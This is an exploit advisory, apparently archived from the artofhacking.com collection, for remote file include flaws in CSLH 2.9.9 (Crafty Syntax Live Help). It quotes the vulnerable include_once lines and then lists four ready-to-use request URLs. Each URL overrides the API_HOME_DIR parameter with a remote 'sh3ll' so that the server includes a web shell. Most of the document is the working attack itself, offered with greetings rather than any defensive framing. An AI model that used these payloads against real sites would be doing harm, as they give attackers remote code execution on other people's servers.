AOH :: HP Unsorted C :: B06-5411.HTM

CSLH2.9.9 Remote File Include Vulnerabilities



CSLH2.9.9 Remote File Include Vulnerabilities
CSLH2.9.9 Remote File Include Vulnerabilities



#########################################################
CSLH2.9.9  Remote File Include Vulnerabilities
 
#########################################################

By Crackers_Child

crackers_child@sibersavascilar.com 

www.sibersavacilar.com 

#########################################################

Download Script

http://craftysyntax.com/CSLH2.9.9.zip 


#########################################################

#########################################################
Bug 

include_once(API_HOME_DIR . "util.php");
include_once(API_HOME_DIR . "const.php");
include_once(API_HOME_DIR . "stringparser.php");

#########################################################
Exploit
#########################################################

www.site.com/CSLH2_path/txt-db-api/stringparser.php?API_HOME_DIR=sh3ll? 

www.site.com/CSLH2_path/txt-db-api/util.php?API_HOME_DIR=sh3ll? 

www.site.com/CSLH2_path/txt-db-api/sql.php?API_HOME_DIR=sh3ll? 

www.site.com/CSLH2_path/txt-db-api/resultset.php?API_HOME_DIR=sh3ll? 

#########################################################

Greetz:All My Friends !

#########################################################

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.